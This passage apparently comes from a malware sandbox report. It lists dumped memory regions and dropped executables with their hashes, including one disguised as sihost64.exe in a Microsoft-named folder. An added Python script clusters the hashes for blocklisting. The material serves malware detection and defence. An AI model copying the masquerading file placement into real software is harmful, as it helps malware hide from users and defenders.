SHA512 53cad1f2170ec291b2088ac290a8d47c868d2e53d5276d9cf9efe5d917461f98bbe28c03eee7bf5e354e546b420f60c2f9ec31901566b5e27817a558392324d9

memory/4864-137-0x0000000000000000-mapping.dmp

memory/4648-138-0x0000000074F70000-0x0000000075521000-memory.dmp

memory/4972-139-0x0000000074F70000-0x0000000075521000-memory.dmp

memory/1392-140-0x0000000000000000-mapping.dmp

memory/4044-141-0x0000000000000000-mapping.dmp

memory/4972-142-0x0000000074F70000-0x0000000075521000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\57080.exe

MD5 fec701bbc6a35f9089309f34afbed29c
SHA1 64a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256 d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512 b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b

memory/2464-143-0x0000000000000000-mapping.dmp

\??\c:\users\admin\appdata\local\temp\57080.exe

MD5 fec701bbc6a35f9089309f34afbed29c
SHA1 64a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256 d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512 b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b

memory/2464-146-0x0000000000050000-0x0000000000060000-memory.dmp
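Read across both behavioral analyses, the Files sections list the same SHA256 (d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409) under three different names, 31609.exe, services64.exe and 57080.exe, and the report prints paths in three styles (\Users\..., C:\Users\... and \??\c:\users\...), so a naive count overstates the number of distinct payloads. The added example below (not code from the report or the sandbox vendor) parses the path-plus-hash records as printed, folds the path styles onto one key, clusters records by SHA256 and checks that records sharing a SHA256 also agree on their other digests, which catches transcription errors when hashes are copied into a blocklist. The records are copied from the Files sections above; only the parsing and clustering logic is new, and the digest-length table is the standard output size of each algorithm.

```python
import re
from collections import defaultdict

EXPECTED_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")

# Records copied from the Files sections above; a memory dump line is
# included to show it being skipped.
FILE_RECORDS = r"""
memory/1504-77-0x000000013FE60000-0x000000013FE70000-memory.dmp

\Users\Admin\AppData\Local\Temp\31609.exe
MD5 fec701bbc6a35f9089309f34afbed29c
SHA1 64a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256 d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512 b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b

\Users\Admin\AppData\Local\Temp\services64.exe
MD5 fec701bbc6a35f9089309f34afbed29c
SHA1 64a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256 d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512 b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b

\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5 9ac3e119ac46c13b65583394ec98fcc7
SHA1 df6a749b58413cd1fd7c78ffe11abaf012dcf877
SHA256 e1e0738756d5498076391e3e889dfb934e4f183108a9367cb6a2e37c8e71bcf4
SHA512 d2262612be676f09bafc61331ba52ebfbbc071c0c4fbfd77bc6efd11bde70e13d06f74c9d1190a22bdb5187312e342c6f9b559b39d865414249aa3767b83c214

C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe
MD5 e141967a41334d6dd1d7c7adac5ca003
SHA1 6f6200ad4360b17ee575b4a761dadc213d34e1b5
SHA256 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2
SHA512 53cad1f2170ec291b2088ac290a8d47c868d2e53d5276d9cf9efe5d917461f98bbe28c03eee7bf5e354e546b420f60c2f9ec31901566b5e27817a558392324d9

C:\Users\Admin\AppData\Local\Temp\57080.exe
MD5 fec701bbc6a35f9089309f34afbed29c
SHA1 64a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256 d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512 b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b

\??\c:\users\admin\appdata\local\temp\57080.exe
MD5 fec701bbc6a35f9089309f34afbed29c
SHA1 64a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256 d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512 b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b
"""


def normalize_path(path):
    # Lower-case, drop the NT object-manager prefix and the drive letter so
    # the report's three path styles compare equal.
    p = path.strip().lower()
    if p.startswith("\\??\\"):
        p = p[4:]
    if len(p) >= 2 and p[1] == ":":
        p = p[2:]
    return p


def parse_file_records(text):
    """Turn path-then-hash-lines blocks into dicts; skip memory dump lines."""
    records, current = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = HASH_LINE.match(line)
        if m:
            if current is None:
                raise ValueError(f"hash line without a preceding path: {line}")
            algo, digest = m.group(1), m.group(2).lower()
            if len(digest) != EXPECTED_LEN[algo]:
                raise ValueError(f"{algo} digest has wrong length: {line}")
            current["hashes"][algo] = digest
        elif line.startswith("memory/"):
            current = None                    # dump artefact, not a file
        else:
            current = {"path": line, "hashes": {}}
            records.append(current)
    return [r for r in records if "SHA256" in r["hashes"]]


def cluster_by_sha256(records):
    """Map each SHA256 to the sorted distinct (normalised) paths it was written to."""
    clusters = defaultdict(set)
    for r in records:
        clusters[r["hashes"]["SHA256"]].add(normalize_path(r["path"]))
    return {digest: sorted(paths) for digest, paths in clusters.items()}


def hash_conflicts(records):
    """Records sharing a SHA256 must agree on MD5/SHA1/SHA512; return those that don't."""
    seen, conflicts = {}, []
    for r in records:
        key = r["hashes"]["SHA256"]
        others = {a: d for a, d in r["hashes"].items() if a != "SHA256"}
        if key in seen and seen[key] != others:
            conflicts.append((r["path"], key))
        seen.setdefault(key, others)
    return conflicts


if __name__ == "__main__":
    recs = parse_file_records(FILE_RECORDS)
    for digest, paths in cluster_by_sha256(recs).items():
        print(digest[:16], len(paths), "path(s):", *paths)
    print("conflicts:", hash_conflicts(recs))
```

Three clusters come out: the dropper itself (35a37aef…), the sihost64.exe payload (e1e07387…) and the d69c8a09… payload under three names, which is the set of file hashes worth blocking regardless of which filename a later variant chooses.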